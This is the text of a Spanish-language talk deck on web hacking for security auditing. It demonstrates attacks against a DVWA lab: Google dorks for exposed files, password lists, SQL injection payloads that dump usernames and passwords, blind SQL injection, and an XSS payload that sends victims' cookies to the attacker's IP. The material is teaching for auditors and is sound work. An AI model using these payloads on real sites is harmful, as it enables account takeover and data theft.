SlideShare una empresa de Scribd logo
1 de 38
IVÁN SANZ DE CASTRO
Hacking Web:
Attacks & Tips
Sobre mí
Iván Sanz de Castro
• Ingeniero de telecomunicaciones (UAH)
• Analista de seguridad (Wise Security)
• Investigador independiente
¿Página Web?
Visibilidad
Marketing
24 horas
Imagen
Venta Online
Servicios
Redes sociales
Bajo coste
Coste
76,6% de las empresas tienen página web según INE
Ataques informáticos:
– Fallos de seguridad
– Vulnerabilidades conocidas
– Fácil explotación
– Exposición de datos sensibles
Consecuencias:
– Impacto en la imagen corporativa
– Suplantación
– Robo de información
– Perdidas económicas
PSN & XBL
Ashley Madison
Consecuencias:
Surge la necesida de profesionales de la ciberseguridad:
• Auditoría web
• Test de intrusión
• Auditoría de app’s móviles
• Análisis forense
• Análisis de malware
• Etc.
Auditoría web
• ¿Es mi web segura?
• ¿Cómo lo arreglo?
Fases
1. Definición del alcance y objetivos
– Caja negra, gris o blanca
2. Ejecución de la revisión
3. Informe:
– Resumen ejecutivo
– Vulnerabilidades
– Salvaguardas
4. Seguimiento
Laboratorio de pruebas
Debian + DVWA: Aplicación Web,
entorno para probar ataques y
explotar vulnerabilidades
Kali Linux: Sistema operativo con
multitud de herramientas de
seguridad informática
192.169.233.128 192.169.233.129
Google Hacking
Comandos avanzados de Google
+
Contenidos sensibles indexados
Operadores (1)
Operador |
Operador +
Operador -
Operador *
Operador “ ”
[ cracker | hacker ]
[ hacker +en UAH ]
[ hacker -examen ]
[ internal * error ]
[ “default password” ]
OR
AND
NOT
Comodín
Comillas
Operadores (2)
• Inurl y Allinurl: Búsqueda de texto en la URL
• Intext y Allintext: Búsqueda en el texto de una página
• Site: Búsqueda en un sitio especifico
• Link: Búsqueda de páginas que enlazan a un sitio
• Filetype o ext: Búsqueda de ficheros de un tipo específico
Ejemplo (1)
inurl:salary inurl:confidential ext:pdf
inurl:/index.htm?cat=info printer Info
inurl:"default.php" intext:"website" "has been successfully
installed on the server!"
Fuerza bruta
aaaaaa
aaaaab
aaaaac
aaaaad
aaaaae
aaaaaf
aaaaag
aaaaah
aaaaai
aaaaaj
aaaaak
aaaaal
aaaaam
aaaaan
aaaaañ
aaaaao
aaaaap
aaaaaq
aaaaar
aaaaas
aaaaat
aaaaau
aaaaav
aaaaaw
aaaaax
aaaaay
aaaaaz
aaaaba
aaaabb
aaaabc
aaaabd
aaaabe
aaaabf
aaaabg
aaaabh
aaaabi
aaaabj
aaaabk
aaaabl
aaaabm
aaaabn
aaaabñ
aaaabo
aaaabp
aaaabq
aaaabr
aaaabs
aaaabt
aaaabu
…
Diccionario
123456
12345678
qwerty
abc123
contraseña
admin
password
monkey
starwars
princess
perro
iloveyou
111111
…
Ejemplo (2) · Burpsuite
• Suite de herramientas de auditoría web
• Proxy local que permite “manipular” peticiones
¿Inyección? (1)
print ‘$variable’;
$variable = ¡Hola mundo!
print ‘¡Hola mundo!’;
>> ¡Hola mundo!
¿Inyección? (2)
print ‘$variable’;
$variable = ‘; shutdocwn(); //
print ‘‘; shutdown(); //’;
>> print ‘‘; shutdown(); //’;
SQL Injection (1)
Consulta a BD:
select id
from user_table
where Username = '$user'
and Password = '$pass';
SQL Injection (2)
$user = admin
$pass = ‘ or ‘1’ = ‘1’; --
select id
from user_table
where Username = 'admin'
and Password = ‘’ or ‘1’ = ‘1’; -- ';
select id
from user_table
where Username = 'admin'
and Password = ‘’ or ‘1’ = ‘1’; -- ';
Ejemplo (3)
• %' or '0'='0
• %' union select null, version()#
Ejecutar funciones, ej: version()
• %' union select null, table_name from
information_schema.tables #
Tablas disponibles
• %' union select null, concat(first_name,0x0a,
last_name,0x0a,user,0x0a,password) from users #
Profit
• %' union select null, concat(table_name,0x0a,
column_name) from information_schema.columns
where table_name = 'users' #
Columnas de la table users
Error-based SQL Injection
… and ‘1’=(select username from users where uid=1)
Resultado:
[ODBC SQL Server Driver][SQL Server]Syntax error converting
the varchar value ‘admin’ to a column of data type int.
Blind SQL Injection
No se muestran errores, ¿sigue siendo posible inyectar?
SI
Web que diferencie entre “true” y “false” al realizar la
inyección
www.dominio.php?id=5 and 1=1
→ Siempre TRUE
www.dominio.php?id=5 and 1=0
→ Siempre FALSE
Ejemplo (4)
www.dominio.com/info.php?id=5
and (ascii(substr((SELECT version()),1,1))) > 52
Cross-Site Scripting (XSS)
• Inyección de código
en la página web:
Javascript, HTML, …
• El navegador de la
victima lo interpreta
como legítimo
Ejemplo(5)
XSS Persistente:
• El código se inyecta y queda “almacenado” en la web.
• Cada vez que un usuario accede al recurso, el código se
ejecuta
Ejemplo(6)
XSS Reflejado:
• El código se inyecta en los valores que se envían a la web
• <script>new Image().src='http://192.168.233.129/log.php?c='
+document.cookie</script>
Cross-Frame Scripting (CFS)
• Incluir el contenido de la web en un frame, dentro
de un dominio ajeno
• Cabecera HTTP X-Frame-Options sin atributo deny
• Ataques sobre usuarios:
– Clickjacking, Keylogger, redirecciones, etc.
Ejemplo (7)
• “CFS – Redirección” → Redirigir al hacer click a web arbitraria
• “CFS – Keylogger” → Capturar y enviar a servidor remoto el
texto introducido por teclado
Y mucho, mucho más…
Muchas gracias
Iván Sanz de Castro
ivan.sanz.dcastro@gmail.com
@junglesec

Más contenido relacionado

La actualidad más candente

La actualidad más candente (7)

Seguridad en el desarrollo de aplicaciones web
Seguridad en el desarrollo de aplicaciones webSeguridad en el desarrollo de aplicaciones web
Seguridad en el desarrollo de aplicaciones web
 
Seguridad web
Seguridad webSeguridad web
Seguridad web
 
Mitigando Eventualidades de Seguridad en Web 2.0 + Semántica
Mitigando Eventualidades de Seguridad en Web 2.0 + SemánticaMitigando Eventualidades de Seguridad en Web 2.0 + Semántica
Mitigando Eventualidades de Seguridad en Web 2.0 + Semántica
 
Vulnerabilidades en Aplicaciones Web PHP
Vulnerabilidades en Aplicaciones Web PHPVulnerabilidades en Aplicaciones Web PHP
Vulnerabilidades en Aplicaciones Web PHP
 
Seguridad web
Seguridad webSeguridad web
Seguridad web
 
Resumen curso de seguridad para desarrolladores de aplicaciones web y móviles...
Resumen curso de seguridad para desarrolladores de aplicaciones web y móviles...Resumen curso de seguridad para desarrolladores de aplicaciones web y móviles...
Resumen curso de seguridad para desarrolladores de aplicaciones web y móviles...
 
Seguridad WEB - Principios básicos.
Seguridad WEB - Principios básicos.Seguridad WEB - Principios básicos.
Seguridad WEB - Principios básicos.
 

Destacado

Lesson 6 web based attacks
Lesson 6 web based attacksLesson 6 web based attacks
Lesson 6 web based attacks
Frank Victory
 
Top Ten Web Attacks
Top Ten Web Attacks Top Ten Web Attacks
Top Ten Web Attacks
Ajay Ohri
 
Zero interest consumer goods purchase schemes
Zero interest consumer goods purchase schemesZero interest consumer goods purchase schemes
Zero interest consumer goods purchase schemes
Chinni Harshith
 

Destacado (20)

Lesson 6 web based attacks
Lesson 6 web based attacksLesson 6 web based attacks
Lesson 6 web based attacks
 
Anatomy Web Attack
Anatomy Web AttackAnatomy Web Attack
Anatomy Web Attack
 
Web attacks
Web attacksWeb attacks
Web attacks
 
Web Application Vulnerabilities
Web Application VulnerabilitiesWeb Application Vulnerabilities
Web Application Vulnerabilities
 
Behind The Scenes Of Web Attacks
Behind The Scenes Of Web AttacksBehind The Scenes Of Web Attacks
Behind The Scenes Of Web Attacks
 
Web Attacks - Top threats - 2010
Web Attacks - Top threats - 2010Web Attacks - Top threats - 2010
Web Attacks - Top threats - 2010
 
Top Ten Web Attacks
Top Ten Web Attacks Top Ten Web Attacks
Top Ten Web Attacks
 
Trends in Web Attacks
Trends in Web AttacksTrends in Web Attacks
Trends in Web Attacks
 
Presentation on Web Attacks
Presentation on Web AttacksPresentation on Web Attacks
Presentation on Web Attacks
 
Real web-attack-scenario
Real web-attack-scenarioReal web-attack-scenario
Real web-attack-scenario
 
Barack obama
Barack obamaBarack obama
Barack obama
 
P (2)
P (2)P (2)
P (2)
 
P (2)
P (2)P (2)
P (2)
 
role model entrepreneur
role model entrepreneurrole model entrepreneur
role model entrepreneur
 
Avon product analysis 2009
Avon product analysis 2009Avon product analysis 2009
Avon product analysis 2009
 
cv
cvcv
cv
 
Soho routers: swords and shields CyberCamp 2015
Soho routers: swords and shields   CyberCamp 2015Soho routers: swords and shields   CyberCamp 2015
Soho routers: swords and shields CyberCamp 2015
 
Zero interest consumer goods purchase schemes
Zero interest consumer goods purchase schemesZero interest consumer goods purchase schemes
Zero interest consumer goods purchase schemes
 
что это с точки зрения бухгалтеского учёта
что это с точки зрения бухгалтеского учётачто это с точки зрения бухгалтеского учёта
что это с точки зрения бухгалтеского учёта
 
CV Workshop - IDinLondon - 11th November 2014, Adam Bolton.
CV Workshop - IDinLondon - 11th November 2014, Adam Bolton.CV Workshop - IDinLondon - 11th November 2014, Adam Bolton.
CV Workshop - IDinLondon - 11th November 2014, Adam Bolton.
 

Similar a Hacking Web: Attacks & Tips

Pentest - El Arte de la Guerra
Pentest - El Arte de la GuerraPentest - El Arte de la Guerra
Pentest - El Arte de la Guerra
Luis Cortes Zavala
 
Seguridad en los videojuegos - GoD Mode
Seguridad en los videojuegos - GoD ModeSeguridad en los videojuegos - GoD Mode
Seguridad en los videojuegos - GoD Mode
Zink Security
 

Similar a Hacking Web: Attacks & Tips (20)

Taller cybersecurity 2016
Taller cybersecurity 2016Taller cybersecurity 2016
Taller cybersecurity 2016
 
Seguridad web, ataque y defensa
Seguridad web, ataque y defensaSeguridad web, ataque y defensa
Seguridad web, ataque y defensa
 
Inyección, XSS, CSRF en ChelaJS
Inyección, XSS, CSRF en ChelaJSInyección, XSS, CSRF en ChelaJS
Inyección, XSS, CSRF en ChelaJS
 
Vulnerabilidades en Aplicaciones Web
Vulnerabilidades en Aplicaciones WebVulnerabilidades en Aplicaciones Web
Vulnerabilidades en Aplicaciones Web
 
Pentest - El Arte de la Guerra
Pentest - El Arte de la GuerraPentest - El Arte de la Guerra
Pentest - El Arte de la Guerra
 
Seguridad Web XSS y BeEF
Seguridad Web XSS y BeEFSeguridad Web XSS y BeEF
Seguridad Web XSS y BeEF
 
Ataques de denegacion de servicio
Ataques de denegacion de servicioAtaques de denegacion de servicio
Ataques de denegacion de servicio
 
La Web como plataforma de referencia: viejos ataques y nuevas vulnerabilidades
La Web como plataforma de referencia: viejos ataques y nuevas vulnerabilidadesLa Web como plataforma de referencia: viejos ataques y nuevas vulnerabilidades
La Web como plataforma de referencia: viejos ataques y nuevas vulnerabilidades
 
La Web como plataforma de referencia: viejos ataques y nuevas vulnerabilidades
La Web como plataforma de referencia: viejos ataques y nuevas vulnerabilidadesLa Web como plataforma de referencia: viejos ataques y nuevas vulnerabilidades
La Web como plataforma de referencia: viejos ataques y nuevas vulnerabilidades
 
Hack & beers lleida seguridad en desarrollo fullstack
Hack & beers lleida   seguridad en desarrollo fullstackHack & beers lleida   seguridad en desarrollo fullstack
Hack & beers lleida seguridad en desarrollo fullstack
 
Seguridad en los videojuegos - GoD Mode
Seguridad en los videojuegos - GoD ModeSeguridad en los videojuegos - GoD Mode
Seguridad en los videojuegos - GoD Mode
 
Resumen curso de seguridad para desarrolladores de aplicaciones web, webservi...
Resumen curso de seguridad para desarrolladores de aplicaciones web, webservi...Resumen curso de seguridad para desarrolladores de aplicaciones web, webservi...
Resumen curso de seguridad para desarrolladores de aplicaciones web, webservi...
 
Desarrollo Web Seguro - Seguridad en Programación
Desarrollo Web Seguro - Seguridad en ProgramaciónDesarrollo Web Seguro - Seguridad en Programación
Desarrollo Web Seguro - Seguridad en Programación
 
Cer tuy capacitaciones2011_v1
Cer tuy capacitaciones2011_v1Cer tuy capacitaciones2011_v1
Cer tuy capacitaciones2011_v1
 
Inyecciones sql para aprendices
Inyecciones sql para aprendicesInyecciones sql para aprendices
Inyecciones sql para aprendices
 
Taller Hacking Ético #Sysmana2012
Taller Hacking Ético #Sysmana2012Taller Hacking Ético #Sysmana2012
Taller Hacking Ético #Sysmana2012
 
Completo conferencia seguridad_web_software_libre_2015
Completo conferencia seguridad_web_software_libre_2015Completo conferencia seguridad_web_software_libre_2015
Completo conferencia seguridad_web_software_libre_2015
 
Azure insight + Streaming Analytics + Power BI
Azure insight + Streaming Analytics + Power BIAzure insight + Streaming Analytics + Power BI
Azure insight + Streaming Analytics + Power BI
 
ciberataques
ciberataquesciberataques
ciberataques
 
Atacando servicios web
Atacando servicios webAtacando servicios web
Atacando servicios web
 

Hacking Web: Attacks & Tips